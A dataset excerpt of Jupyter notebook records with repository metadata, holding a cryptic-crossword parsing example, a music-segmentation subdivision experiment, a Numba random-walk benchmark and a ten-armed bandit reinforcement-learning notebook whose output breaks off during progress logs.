| Column | Type | Min | Max |
| --- | --- | --- | --- |
| hexsha | stringlengths | 40 | 40 |
| size | int64 | 6 | 14.9M |
| ext | stringclasses | 1 value | |
| lang | stringclasses | 1 value | |
| max_stars_repo_path | stringlengths | 6 | 260 |
| max_stars_repo_name | stringlengths | 6 | 119 |
| max_stars_repo_head_hexsha | stringlengths | 40 | 41 |
| max_stars_repo_licenses | list | | |
| max_stars_count | int64 | 1 | 191k |
| max_stars_repo_stars_event_min_datetime | stringlengths | 24 | 24 |
| max_stars_repo_stars_event_max_datetime | stringlengths | 24 | 24 |
| max_issues_repo_path | stringlengths | 6 | 260 |
| max_issues_repo_name | stringlengths | 6 | 119 |
| max_issues_repo_head_hexsha | stringlengths | 40 | 41 |
| max_issues_repo_licenses | list | | |
| max_issues_count | int64 | 1 | 67k |
| max_issues_repo_issues_event_min_datetime | stringlengths | 24 | 24 |
| max_issues_repo_issues_event_max_datetime | stringlengths | 24 | 24 |
| max_forks_repo_path | stringlengths | 6 | 260 |
| max_forks_repo_name | stringlengths | 6 | 119 |
| max_forks_repo_head_hexsha | stringlengths | 40 | 41 |
| max_forks_repo_licenses | list | | |
| max_forks_count | int64 | 1 | 105k |
| max_forks_repo_forks_event_min_datetime | stringlengths | 24 | 24 |
| max_forks_repo_forks_event_max_datetime | stringlengths | 24 | 24 |
| avg_line_length | float64 | 2 | 1.04M |
| max_line_length | int64 | 2 | 11.2M |
| alphanum_fraction | float64 | 0 | 1 |
| cells | list | | |
| cell_types | list | | |
| cell_type_groups | list | | |
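Each record carries the repository metadata columns above plus three list columns holding the notebook content (`cells`, `cell_types`, `cell_type_groups`). As a quick illustration, the sketch below prints a one-line summary of a record, assuming the record is available as a plain Python dict keyed by these column names; the field names come from the schema, the example values are copied from the first record shown below, and everything else is hypothetical glue code, not part of the dataset tooling.

```python
# Minimal sketch (not part of the dataset): summarise one record, assuming it
# is available as a plain Python dict keyed by the column names listed above.

def summarise_record(row: dict) -> str:
    """Return a one-line summary of a notebook record's scalar metadata."""
    return (
        f"{row['max_stars_repo_name']}:{row['max_stars_repo_path']} "
        f"({row['ext']}, {row['size']} bytes, "
        f"stars={row['max_stars_count']}, licenses={row['max_stars_repo_licenses']}, "
        f"avg_line_length={row['avg_line_length']:.2f}, "
        f"alphanum_fraction={row['alphanum_fraction']:.3f})"
    )

# Example values copied from the first record below:
example = {
    "max_stars_repo_name": "PhilHarnish/forge",
    "max_stars_repo_path": "src/puzzle/examples/crossword_cryptic/pack01_01.ipynb",
    "ext": "ipynb",
    "size": 2528,
    "max_stars_count": 2,
    "max_stars_repo_licenses": ["MIT"],
    "avg_line_length": 25.535354,
    "alphanum_fraction": 0.568038,
}
print(summarise_record(example))
```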
hexsha: cb1bc73fe62b15f7c7471ebe13486f2841e58781
size: 2,528
ext: ipynb
lang: Jupyter Notebook
max_stars_repo_path: src/puzzle/examples/crossword_cryptic/pack01_01.ipynb
max_stars_repo_name: PhilHarnish/forge
max_stars_repo_head_hexsha: 663f19d759b94d84935c14915922070635a4af65
max_stars_repo_licenses: [ "MIT" ]
max_stars_count: 2
max_stars_repo_stars_event_min_datetime: 2020-08-18T18:43:09.000Z
max_stars_repo_stars_event_max_datetime: 2020-08-18T20:05:59.000Z
max_issues_repo_path: src/puzzle/examples/crossword_cryptic/pack01_01.ipynb
max_issues_repo_name: PhilHarnish/forge
max_issues_repo_head_hexsha: 663f19d759b94d84935c14915922070635a4af65
max_issues_repo_licenses: [ "MIT" ]
max_issues_count: null
max_issues_repo_issues_event_min_datetime: null
max_issues_repo_issues_event_max_datetime: null
max_forks_repo_path: src/puzzle/examples/crossword_cryptic/pack01_01.ipynb
max_forks_repo_name: PhilHarnish/forge
max_forks_repo_head_hexsha: 663f19d759b94d84935c14915922070635a4af65
max_forks_repo_licenses: [ "MIT" ]
max_forks_count: null
max_forks_repo_forks_event_min_datetime: null
max_forks_repo_forks_event_max_datetime: null
avg_line_length: 25.535354
max_line_length: 67
alphanum_fraction: 0.568038
cells, cell_types, cell_type_groups:
[ [ [ "import forge\nfrom puzzle.puzzlepedia import puzzlepedia\n\npuzzle = puzzlepedia.parse(\"\"\"\nSam dreamt about European port (9)\nTrash was put by the exit, initially (5)\nJust revenge - sense I'm crazy (7)\nCucumber is a bit tougher, kinked (7)\nLizard, good with Coke, oddly (5)\nFather's attempt to get pie-crust (6)\nHelp in class is trainee (6)\nTakes a chance, right, and skis off (5)\nClimber's aid gives muscular pain (no turning back) (7)\nEdwin's upset about Lloyds' first fraud (7)\nBegin, s-sweet thing! (5)\nInexperienced band intended to limit urban sprawl (5, 4)\nPus-filled swelling: scab's broken round edges of ears (7)\nRarely cooked cut of meat? (5)\nCause of Pacific floods crashing on Nile (2, 4)\nLegal compensation: water barrier takes a long time (7)\nPop, say, made by American stuck in short microphone (5)\nA tree shoot - understand? (4)\nAccompany a very popular former car model (6)\nHe raps odd group of words (6)\nControversial novelist with a hurry to snuff it! (7)\nIn-body device made from tin lamp (7)\nAwful scene about right PC etc. display (6)\nVocalize about large arm support (5)\nPart of a church in Paisley (5)\nExclusive school raising paper money (4)\n\"\"\")", "_____no_output_____" ], [ "puzzlepedia.interact_with(puzzle)", "_____no_output_____" ] ] ]
[ "code" ]
[ [ "code", "code" ] ]
hexsha: cb1bc8d524640ca4d845294a0b32533927375b1b
size: 641,762
ext: ipynb
lang: Jupyter Notebook
max_stars_repo_path: Notebooks/Notebooks ISMIR 2020/3 - Subdivisions of bars.ipynb
max_stars_repo_name: ax-le/MusicNTD
max_stars_repo_head_hexsha: 682d67a7b25378200356db5ba9a831e4b05401cb
max_stars_repo_licenses: [ "BSD-3-Clause" ]
max_stars_count: null
max_stars_repo_stars_event_min_datetime: null
max_stars_repo_stars_event_max_datetime: null
max_issues_repo_path: Notebooks/Notebooks ISMIR 2020/3 - Subdivisions of bars.ipynb
max_issues_repo_name: ax-le/MusicNTD
max_issues_repo_head_hexsha: 682d67a7b25378200356db5ba9a831e4b05401cb
max_issues_repo_licenses: [ "BSD-3-Clause" ]
max_issues_count: null
max_issues_repo_issues_event_min_datetime: null
max_issues_repo_issues_event_max_datetime: null
max_forks_repo_path: Notebooks/Notebooks ISMIR 2020/3 - Subdivisions of bars.ipynb
max_forks_repo_name: ax-le/MusicNTD
max_forks_repo_head_hexsha: 682d67a7b25378200356db5ba9a831e4b05401cb
max_forks_repo_licenses: [ "BSD-3-Clause" ]
max_forks_count: 1
max_forks_repo_forks_event_min_datetime: 2021-04-07T17:01:54.000Z
max_forks_repo_forks_event_max_datetime: 2021-04-07T17:01:54.000Z
avg_line_length: 260.349696
max_line_length: 130,716
alphanum_fraction: 0.858906
cells, cell_types, cell_type_groups:
[ [ [ "import musicntd.scripts.hide_code as hide", "C:\\Users\\amarmore\\AppData\\Local\\Continuum\\anaconda3\\envs\\NTD_segmentation\\lib\\site-packages\\librosa\\util\\decorators.py:9: NumbaDeprecationWarning: \u001b[1mAn import was requested from a module that has moved location.\nImport requested from: 'numba.decorators', please update to use 'numba.core.decorators' or pin to Numba version 0.48.0. This alias will not be present in Numba version 0.50.0.\u001b[0m\n from numba.decorators import jit as optional_jit\nC:\\Users\\amarmore\\AppData\\Local\\Continuum\\anaconda3\\envs\\NTD_segmentation\\lib\\site-packages\\librosa\\util\\decorators.py:9: NumbaDeprecationWarning: \u001b[1mAn import was requested from a module that has moved location.\nImport of 'jit' requested from: 'numba.decorators', please update to use 'numba.core.decorators' or pin to Numba version 0.48.0. This alias will not be present in Numba version 0.50.0.\u001b[0m\n from numba.decorators import jit as optional_jit\n" ] ], [ [ "# From padding to subdivision", "_____no_output_____" ], [ "As evoked in the 1st notebook, in previous experiments, every bar of the tensor was zero-padded if it was shorter than the longest bar of the song.\n\nThis fix is not satisfactory, as it creates null artifacts at the end of most of the slices of the tensor.", "_____no_output_____" ], [ "## Description of the subdivision method", "_____no_output_____" ], [ "Instead, we decided to over-sample the chromagram (32-sample hop) and then select the same number of frames in each bar. This way, rather than having equally spaced frames in all bars of the tensor which resulted in slices of the tensor of inequal sizes (before padding), it now computes bar-chromagrams of the same number of frames, which is a parameter to be set. In each bar-chromagram, frames are almost* equally spaced, but the gap between two consecutive frames in two different bars can now be different.\n\nWe call **subdivision** of bars the number of frames we select in each bar. This parameter is to be set, and we will try to evaluate a good parameter in the next part of this notebook.\n\nConcretely, let's consider the chromagram of a particular bar, starting at time $t_0$ and ending at time $t_1$. This chromagram contains $n = (t_1 - t_0 + 1) * \\frac{s_r}{32}$ frames, with $s_r$ the sampling rate. In this chromagram, given a subdivision $sub$, we will select frame at indexes $\\{k * \\frac{n}{sub}$ for $k \\in [0, sub[$ and $k$ integer $\\}$. 
As indexes need to be integers, we need to round the precedent expression.\n\n*almost, because of the rounding operation presented above", "_____no_output_____" ], [ "# Setting the subdivision parameter\n\nWe will test three values for the subdivision parameter:\n - 96 (24 beats per bar),\n - 128 (32 beats per bar),\n - 192 (48 beats per bar).\n \nWe will test the segmentation on the entire RWC Popular dataset, with MIREX10 annotations, and by testing several ranks (16,24,32,40) for $H$ and $Q$.\n\nNote that, due to the conclusion in Notebook 2, we now have fixed $W$ to the 12-size identity matrix.", "_____no_output_____" ] ], [ [ "# On définit le type d'annotations\nannotations_type = \"MIREX10\"\nranks_rhythm = [16,24,32,40]\nranks_pattern = [16,24,32,40]", "_____no_output_____" ] ], [ [ "## Subdivision 96", "_____no_output_____" ], [ "### Fixed ranks\n\nBelow are segmentation results with the subdivision fixed to 96, for the different ranks values, on the RWC Pop dataset.\n\nResults are computed with tolerance of respectively 0.5 seconds and 3 seconds. ", "_____no_output_____" ] ], [ [ "zero_five_nine, three_nine = hide.compute_ranks_RWC(ranks_rhythm,ranks_pattern, W = \"chromas\", annotations_type = annotations_type,\n subdivision=96, penalty_weight = 1)", "c:\\users\\amarmore\\desktop\\projects\\phd main projects\\on git\\code\\tensor factorization\\musicntd\\autosimilarity_segmentation.py:43: RuntimeWarning: invalid value encountered in true_divide\n this_array = np.array([list(i/np.linalg.norm(i)) for i in this_array.T]).T\n" ] ], [ [ "### Oracle ranks\n\nIn this condition, we only keep the ranks leading to the highest F measure.\n\nIn that sense, it's an optimistic upper bound on metrics.", "_____no_output_____" ] ], [ [ "hide.printmd(\"**A 0.5 secondes:**\")\nbest_chr_zero_five = hide.best_f_one_score_rank(zero_five_nine)\nhide.printmd(\"**A 3 secondes:**\")\nbest_chr_three = hide.best_f_one_score_rank(three_nine)", "_____no_output_____" ] ], [ [ "Below is presented the distribution of the optimal ranks in the \"oracle ranks\" condition, _i.e._ the distribution of the ranks for $H$ and $Q$ which result in the highest F measure for the different songs.", "_____no_output_____" ] ], [ [ "hide.plot_3d_ranks_study(zero_five_nine, ranks_rhythm, ranks_pattern)", "_____no_output_____" ] ], [ [ "Below is shown the distribution histogram of the F measure obtained with the oracle ranks.", "_____no_output_____" ] ], [ [ "hide.plot_f_mes_histogram(zero_five_nine)", "_____no_output_____" ] ], [ [ "Finally, here are displayed the 5 worst songs in term of F measure in this condition.", "_____no_output_____" ] ], [ [ "hide.return_worst_songs(zero_five_nine, 5)", "_____no_output_____" ] ], [ [ "## Subdivision 128", "_____no_output_____" ], [ "### Fixed ranks\n\nBelow are segmentation results with the subdivision fixed to 128, for the different ranks values, on the RWC Pop dataset.\n\nResults are computed with tolerance of respectively 0.5 seconds and 3 seconds. 
", "_____no_output_____" ] ], [ [ "zero_five_cent, three_cent = hide.compute_ranks_RWC(ranks_rhythm,ranks_pattern, W = \"chromas\", annotations_type = annotations_type,\n subdivision=128, penalty_weight = 1)", "c:\\users\\amarmore\\desktop\\projects\\phd main projects\\on git\\code\\tensor factorization\\musicntd\\autosimilarity_segmentation.py:43: RuntimeWarning: invalid value encountered in true_divide\n this_array = np.array([list(i/np.linalg.norm(i)) for i in this_array.T]).T\n" ] ], [ [ "### Oracle ranks\n\nIn this condition, we only keep the ranks leading to the highest F measure.\n\nIn that sense, it's an optimistic upper bound.", "_____no_output_____" ] ], [ [ "hide.printmd(\"**A 0.5 secondes:**\")\nbest_chr_zero_five = hide.best_f_one_score_rank(zero_five_cent)\nhide.printmd(\"**A 3 secondes:**\")\nbest_chr_three = hide.best_f_one_score_rank(three_cent)", "_____no_output_____" ] ], [ [ "Below is presented the distribution of the optimal ranks in the \"oracle ranks\" condition, _i.e._ the distribution of the ranks for $H$ and $Q$ which result in the highest F measure for the different songs.", "_____no_output_____" ] ], [ [ "hide.plot_3d_ranks_study(zero_five_cent, ranks_rhythm, ranks_pattern)", "_____no_output_____" ] ], [ [ "Below is shown the distribution histogram of the F measure obtained with the oracle ranks.", "_____no_output_____" ] ], [ [ "hide.plot_f_mes_histogram(zero_five_cent)", "_____no_output_____" ] ], [ [ "Finally, here are displayed the 5 worst songs in term of F measure in this condition.", "_____no_output_____" ] ], [ [ "hide.return_worst_songs(zero_five_cent, 5)", "_____no_output_____" ] ], [ [ "## Subdivision 192", "_____no_output_____" ], [ "### Fixed ranks\n\nBelow are segmentation results with the subdivision fixed to 192, for the different ranks values, on the RWC Pop dataset.\n\nResults are computed with tolerance of respectively 0.5 seconds and 3 seconds. 
", "_____no_output_____" ] ], [ [ "zero_five_hunnine, three_hunnine = hide.compute_ranks_RWC(ranks_rhythm,ranks_pattern, W = \"chromas\", annotations_type = annotations_type,\n subdivision=192, penalty_weight = 1)", "c:\\users\\amarmore\\desktop\\projects\\phd main projects\\on git\\code\\tensor factorization\\musicntd\\autosimilarity_segmentation.py:43: RuntimeWarning: invalid value encountered in true_divide\n this_array = np.array([list(i/np.linalg.norm(i)) for i in this_array.T]).T\n" ] ], [ [ "### Oracle ranks\n\nIn this condition, we only keep the ranks leading to the highest F measure.\n\nIn that sense, it's an optimistic upper bound.", "_____no_output_____" ] ], [ [ "hide.printmd(\"**A 0.5 secondes:**\")\nbest_chr_zero_five = hide.best_f_one_score_rank(zero_five_hunnine)\nhide.printmd(\"**A 3 secondes:**\")\nbest_chr_three = hide.best_f_one_score_rank(three_hunnine)", "_____no_output_____" ] ], [ [ "Below is presented the distribution of the optimal ranks in the \"oracle ranks\" condition, _i.e._ the distribution of the ranks for $H$ and $Q$ which result in the highest F measure for the different songs.", "_____no_output_____" ] ], [ [ "hide.plot_3d_ranks_study(zero_five_hunnine, ranks_rhythm, ranks_pattern)", "_____no_output_____" ] ], [ [ "Below is shown the distribution histogram of the F measure obtained with the oracle ranks.", "_____no_output_____" ] ], [ [ "hide.plot_f_mes_histogram(zero_five_hunnine)", "_____no_output_____" ] ], [ [ "Finally, here are displayed the 5 worst songs in term of F measure in this condition.", "_____no_output_____" ] ], [ [ "hide.return_worst_songs(zero_five_hunnine, 5)", "_____no_output_____" ] ], [ [ "# Conclusion", "_____no_output_____" ], [ "We didn't find the difference in the segmentation results to be significative.\n\nIn that sense, we concluded that the three tested subdivisions were equally satisfying for our experiments, and we decided to pursue with the **96** subdivision only, in order to reduce computation time and complexity, as it is the smallest tested value.\n\n96 also presents the advantage (compared to 128) to be divisible by 3 and 4, which are the most common number of beats per bar in western pop music (even if, for now, we have restricted our study to music with 4 beats per bar).", "_____no_output_____" ] ] ]
[ "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown" ]
[ [ "code" ], [ "markdown", "markdown", "markdown", "markdown", "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown" ] ]
hexsha: cb1bd40de992f8f6d3673a65ed72e10573b47f87
size: 131,945
ext: ipynb
lang: Jupyter Notebook
max_stars_repo_path: Numba/02_random_walk.ipynb
max_stars_repo_name: enricocid/python_gis
max_stars_repo_head_hexsha: 031462b370781acb2bb429a1027088fd381bce5b
max_stars_repo_licenses: [ "CC-BY-4.0" ]
max_stars_count: 7
max_stars_repo_stars_event_min_datetime: 2021-09-27T16:36:43.000Z
max_stars_repo_stars_event_max_datetime: 2021-12-10T21:03:52.000Z
max_issues_repo_path: Numba/02_random_walk.ipynb
max_issues_repo_name: enricocid/python_gis
max_issues_repo_head_hexsha: 031462b370781acb2bb429a1027088fd381bce5b
max_issues_repo_licenses: [ "CC-BY-4.0" ]
max_issues_count: null
max_issues_repo_issues_event_min_datetime: null
max_issues_repo_issues_event_max_datetime: null
max_forks_repo_path: Numba/02_random_walk.ipynb
max_forks_repo_name: enricocid/python_gis
max_forks_repo_head_hexsha: 031462b370781acb2bb429a1027088fd381bce5b
max_forks_repo_licenses: [ "CC-BY-4.0" ]
max_forks_count: 6
max_forks_repo_forks_event_min_datetime: 2021-10-02T17:49:24.000Z
max_forks_repo_forks_event_max_datetime: 2021-12-02T20:06:06.000Z
avg_line_length: 999.583333
max_line_length: 128,510
alphanum_fraction: 0.954519
cells, cell_types, cell_type_groups:
[ [ [ "import numpy as np\nfrom numba import jit\nimport matplotlib.pyplot as plt\nimport matplotlib.patheffects as pe\n\nplt.style.use('default')", "_____no_output_____" ] ], [ [ "<b> Numba implementation of Random Walk (2D) in 8 directions </b>\n<br>\n[Adapted from: geeksforgeeks](https://www.geeksforgeeks.org/random-walk-implementation-python/)", "_____no_output_____" ] ], [ [ "@jit(nopython=True)\ndef random_walk_2d_n8(nwalks):\n # Arrays to store x, y coordinates\n x = np.zeros(nwalks)\n y = np.zeros(nwalks)\n \n # 8 directions\n n8 = [(-1,-1), (-1,0), (-1,1), (0,-1), (0,1), (1,-1), (1,0), (1,1)]\n for n in range(nwalks):\n idx = np.random.choice(len(n8), 1)[0]\n x[n] = x[n - 1] + n8[idx][0]\n y[n] = y[n - 1] + n8[idx][1] \n return x, y", "_____no_output_____" ], [ "x, y = random_walk_2d_n8(nwalks=10000000)", "_____no_output_____" ], [ "# Show the result\nfig, ax = plt.subplots()\nax.set_title(\"Random walk (2D) - 8 directions\")\n\n# Plot the lines\nax.plot(x, y, lw= 0.05)\n\n# Start point\nax.scatter(x[0], y[0], zorder=5, c=\"k\")\nax.annotate(\"Start\", (x[0] + 100, y[0]), zorder=5, c=\"k\", weight=\"bold\",\n path_effects=[pe.withStroke(linewidth=2, foreground=\"white\")])\n# End point\nax.scatter(x[-1], y[-1], zorder=5, c=\"k\")\nax.annotate(\"End\", (x[-1] + 100, y[-1]), zorder=5, c=\"k\", weight=\"bold\",\n path_effects=[pe.withStroke(linewidth=2, foreground=\"white\")])\n\nax.grid(linewidth=0.3)\nplt.tight_layout()", "_____no_output_____" ] ], [ [ "<b> Numba vs Loop: 10M walks </b>\n\n%%timeit results with @jit(nopython=True) decorator:<br>\n😍 <b>Numba</b>: 1.15 s ± 29.5 ms per loop (mean ± std. dev. of 7 runs, 1 loop each)\n\n%%timeit results without @jit(nopython=True) decorator:<br>\n😴 <b>Loop</b>: 3min 33s ± 11.9 s per loop (mean ± std. dev. of 7 runs, 1 loop each)", "_____no_output_____" ] ] ]
[ "code", "markdown", "code", "markdown" ]
[ [ "code" ], [ "markdown" ], [ "code", "code", "code" ], [ "markdown" ] ]
hexsha: cb1be4f0abba0092455f88e08cb7ede33160d72a
size: 283,743
ext: ipynb
lang: Jupyter Notebook
max_stars_repo_path: chapter02/ten_armed_testbed.ipynb
max_stars_repo_name: leeyt/reinforcement-learning-an-introduction
max_stars_repo_head_hexsha: ec46e9aec05e5ba918ca3b2216b8681b37666cab
max_stars_repo_licenses: [ "Apache-2.0" ]
max_stars_count: null
max_stars_repo_stars_event_min_datetime: null
max_stars_repo_stars_event_max_datetime: null
max_issues_repo_path: chapter02/ten_armed_testbed.ipynb
max_issues_repo_name: leeyt/reinforcement-learning-an-introduction
max_issues_repo_head_hexsha: ec46e9aec05e5ba918ca3b2216b8681b37666cab
max_issues_repo_licenses: [ "Apache-2.0" ]
max_issues_count: null
max_issues_repo_issues_event_min_datetime: null
max_issues_repo_issues_event_max_datetime: null
max_forks_repo_path: chapter02/ten_armed_testbed.ipynb
max_forks_repo_name: leeyt/reinforcement-learning-an-introduction
max_forks_repo_head_hexsha: ec46e9aec05e5ba918ca3b2216b8681b37666cab
max_forks_repo_licenses: [ "Apache-2.0" ]
max_forks_count: 1
max_forks_repo_forks_event_min_datetime: 2022-02-10T13:41:30.000Z
max_forks_repo_forks_event_max_datetime: 2022-02-10T13:41:30.000Z
avg_line_length: 513.097649
max_line_length: 127,434
alphanum_fraction: 0.925838
cells, cell_types, cell_type_groups:
[ [ [ "#######################################################################\n# Copyright (C) #\n# 2016-2018 Shangtong Zhang([email protected]) #\n# 2016 Tian Jun([email protected]) #\n# 2016 Artem Oboturov([email protected]) #\n# 2016 Kenta Shimada([email protected]) #\n# Permission given to modify the code as long as you keep this #\n# declaration at the top #\n#######################################################################", "_____no_output_____" ], [ "import matplotlib\nmatplotlib.use('Agg')\n\nimport matplotlib.pyplot as plt\n%matplotlib inline\n\nimport numpy as np\nfrom tqdm import tqdm", "_____no_output_____" ], [ "class Bandit:\n # @k_arm: # of arms\n # @epsilon: probability for exploration in epsilon-greedy algorithm\n # @initial: initial estimation for each action\n # @step_size: constant step size for updating estimations\n # @sample_averages: if True, use sample averages to update estimations instead of constant step size\n # @UCB_param: if not None, use UCB algorithm to select action\n # @gradient: if True, use gradient based bandit algorithm\n # @gradient_baseline: if True, use average reward as baseline for gradient based bandit algorithm\n def __init__(self, k_arm=10, epsilon=0., initial=0., step_size=0.1, sample_averages=False, UCB_param=None,\n gradient=False, gradient_baseline=False, true_reward=0.):\n self.k = k_arm\n self.step_size = step_size\n self.sample_averages = sample_averages\n self.indices = np.arange(self.k)\n self.time = 0\n self.UCB_param = UCB_param\n self.gradient = gradient\n self.gradient_baseline = gradient_baseline\n self.average_reward = 0\n self.true_reward = true_reward\n self.epsilon = epsilon\n self.initial = initial\n\n def reset(self):\n # real reward for each action\n self.q_true = np.random.randn(self.k) + self.true_reward\n\n # estimation for each action\n self.q_estimation = np.zeros(self.k) + self.initial\n\n # # of chosen times for each action\n self.action_count = np.zeros(self.k)\n\n self.best_action = np.argmax(self.q_true)\n\n # get an action for this bandit\n def act(self):\n if np.random.rand() < self.epsilon:\n return np.random.choice(self.indices)\n\n if self.UCB_param is not None:\n UCB_estimation = self.q_estimation + \\\n self.UCB_param * np.sqrt(np.log(self.time + 1) / (self.action_count + 1e-5))\n q_best = np.max(UCB_estimation)\n return np.random.choice([action for action, q in enumerate(UCB_estimation) if q == q_best])\n\n if self.gradient:\n exp_est = np.exp(self.q_estimation)\n self.action_prob = exp_est / np.sum(exp_est)\n return np.random.choice(self.indices, p=self.action_prob)\n\n return np.argmax(self.q_estimation)\n\n # take an action, update estimation for this action\n def step(self, action):\n # generate the reward under N(real reward, 1)\n reward = np.random.randn() + self.q_true[action]\n self.time += 1\n self.average_reward = (self.time - 1.0) / self.time * self.average_reward + reward / self.time\n self.action_count[action] += 1\n\n if self.sample_averages:\n # update estimation using sample averages\n self.q_estimation[action] += 1.0 / self.action_count[action] * (reward - self.q_estimation[action])\n elif self.gradient:\n one_hot = np.zeros(self.k)\n one_hot[action] = 1\n if self.gradient_baseline:\n baseline = self.average_reward\n else:\n baseline = 0\n self.q_estimation = self.q_estimation + self.step_size * (reward - baseline) * (one_hot - self.action_prob)\n else:\n # update estimation with constant step size\n self.q_estimation[action] += self.step_size * (reward - 
self.q_estimation[action])\n return reward", "_____no_output_____" ], [ "def simulate(runs, time, bandits):\n best_action_counts = np.zeros((len(bandits), runs, time))\n rewards = np.zeros(best_action_counts.shape)\n for i, bandit in enumerate(bandits):\n for r in tqdm(range(runs)):\n bandit.reset()\n for t in range(time):\n action = bandit.act()\n reward = bandit.step(action)\n rewards[i, r, t] = reward\n if action == bandit.best_action:\n best_action_counts[i, r, t] = 1\n best_action_counts = best_action_counts.mean(axis=1)\n rewards = rewards.mean(axis=1)\n return best_action_counts, rewards", "_____no_output_____" ], [ "def figure_2_1():\n plt.violinplot(dataset=np.random.randn(200,10) + np.random.randn(10))\n plt.xlabel(\"Action\")\n plt.ylabel(\"Reward distribution\")\n plt.show()\n \nfigure_2_1()", "_____no_output_____" ], [ "def figure_2_2(runs=2000, time=1000):\n epsilons = [0, 0.1, 0.01]\n bandits = [Bandit(epsilon=eps, sample_averages=True) for eps in epsilons]\n best_action_counts, rewards = simulate(runs, time, bandits)\n\n plt.figure(figsize=(10, 20))\n\n plt.subplot(2, 1, 1)\n for eps, rewards in zip(epsilons, rewards):\n plt.plot(rewards, label='epsilon = %.02f' % (eps))\n plt.xlabel('steps')\n plt.ylabel('average reward')\n plt.legend()\n\n plt.subplot(2, 1, 2)\n for eps, counts in zip(epsilons, best_action_counts):\n plt.plot(counts, label='epsilon = %.02f' % (eps))\n plt.xlabel('steps')\n plt.ylabel('% optimal action')\n plt.legend()\n\n plt.show()\n \nfigure_2_2()", "100%|██████████| 2000/2000 [00:21<00:00, 95.09it/s] \n100%|██████████| 2000/2000 [00:17<00:00, 114.55it/s]\n100%|██████████| 2000/2000 [00:18<00:00, 106.24it/s]\n" ], [ "def figure_2_3(runs=2000, time=1000):\n bandits = []\n bandits.append(Bandit(epsilon=0, initial=5, step_size=0.1))\n bandits.append(Bandit(epsilon=0.1, initial=0, step_size=0.1))\n best_action_counts, _ = simulate(runs, time, bandits)\n\n plt.plot(best_action_counts[0], label='epsilon = 0, q = 5')\n plt.plot(best_action_counts[1], label='epsilon = 0.1, q = 0')\n plt.xlabel('Steps')\n plt.ylabel('% optimal action')\n plt.legend()\n\n plt.show()\n \nfigure_2_3()", "100%|██████████| 2000/2000 [00:16<00:00, 120.66it/s]\n100%|██████████| 2000/2000 [00:17<00:00, 113.55it/s]\n" ], [ "def figure_2_4(runs=2000, time=1000):\n bandits = []\n bandits.append(Bandit(epsilon=0, UCB_param=2, sample_averages=True))\n bandits.append(Bandit(epsilon=0.1, sample_averages=True))\n _, average_rewards = simulate(runs, time, bandits)\n\n plt.plot(average_rewards[0], label='UCB c = 2')\n plt.plot(average_rewards[1], label='epsilon greedy epsilon = 0.1')\n plt.xlabel('Steps')\n plt.ylabel('Average reward')\n plt.legend()\n\n plt.show()\n\nfigure_2_4()", "100%|██████████| 2000/2000 [01:38<00:00, 20.41it/s]\n100%|██████████| 2000/2000 [00:17<00:00, 111.15it/s]\n" ], [ "def figure_2_5(runs=2000, time=1000):\n bandits = []\n bandits.append(Bandit(gradient=True, step_size=0.1, gradient_baseline=True, true_reward=4))\n bandits.append(Bandit(gradient=True, step_size=0.1, gradient_baseline=False, true_reward=4))\n bandits.append(Bandit(gradient=True, step_size=0.4, gradient_baseline=True, true_reward=4))\n bandits.append(Bandit(gradient=True, step_size=0.4, gradient_baseline=False, true_reward=4))\n best_action_counts, _ = simulate(runs, time, bandits)\n labels = ['alpha = 0.1, with baseline',\n 'alpha = 0.1, without baseline',\n 'alpha = 0.4, with baseline',\n 'alpha = 0.4, without baseline']\n\n for i in range(0, len(bandits)):\n plt.plot(best_action_counts[i], 
label=labels[i])\n plt.xlabel('Steps')\n plt.ylabel('% Optimal action')\n plt.legend()\n\n plt.show()\n\nfigure_2_5()", "100%|██████████| 2000/2000 [02:15<00:00, 14.72it/s]\n100%|██████████| 2000/2000 [02:23<00:00, 13.92it/s]\n100%|██████████| 2000/2000 [02:07<00:00, 15.65it/s]\n100%|██████████| 2000/2000 [02:16<00:00, 14.68it/s]\n" ], [ "def figure_2_6(runs=2000, time=1000):\n labels = ['epsilon-greedy', 'gradient bandit',\n 'UCB', 'optimistic initialization']\n generators = [lambda epsilon: Bandit(epsilon=epsilon, sample_averages=True),\n lambda alpha: Bandit(gradient=True, step_size=alpha, gradient_baseline=True),\n lambda coef: Bandit(epsilon=0, UCB_param=coef, sample_averages=True),\n lambda initial: Bandit(epsilon=0, initial=initial, step_size=0.1)]\n parameters = [np.arange(-7, -1, dtype=np.float),\n np.arange(-5, 2, dtype=np.float),\n np.arange(-4, 3, dtype=np.float),\n np.arange(-2, 3, dtype=np.float)]\n\n bandits = []\n for generator, parameter in zip(generators, parameters):\n for param in parameter:\n bandits.append(generator(pow(2, param)))\n\n _, average_rewards = simulate(runs, time, bandits)\n rewards = np.mean(average_rewards, axis=1)\n\n i = 0\n for label, parameter in zip(labels, parameters):\n l = len(parameter)\n plt.plot(parameter, rewards[i:i+l], label=label)\n i += l\n plt.xlabel('Parameter(2^x)')\n plt.ylabel('Average reward')\n plt.legend()\n\n plt.show()\n\nfigure_2_6()", "100%|██████████| 2000/2000 [00:16<00:00, 122.12it/s]\n100%|██████████| 2000/2000 [00:20<00:00, 96.76it/s] \n100%|██████████| 2000/2000 [00:21<00:00, 94.87it/s]\n100%|██████████| 2000/2000 [00:17<00:00, 117.48it/s]\n100%|██████████| 2000/2000 [00:20<00:00, 99.63it/s] \n100%|██████████| 2000/2000 [00:19<00:00, 101.89it/s]\n100%|██████████| 2000/2000 [02:16<00:00, 14.66it/s]\n100%|██████████| 2000/2000 [02:13<00:00, 14.98it/s]\n100%|██████████| 2000/2000 [02:55<00:00, 11.40it/s]\n100%|██████████| 2000/2000 [02:21<00:00, 14.09it/s]\n100%|██████████| 2000/2000 [02:14<00:00, 14.85it/s]\n100%|██████████| 2000/2000 [02:10<00:00, 15.28it/s]\n100%|██████████| 2000/2000 [02:13<00:00, 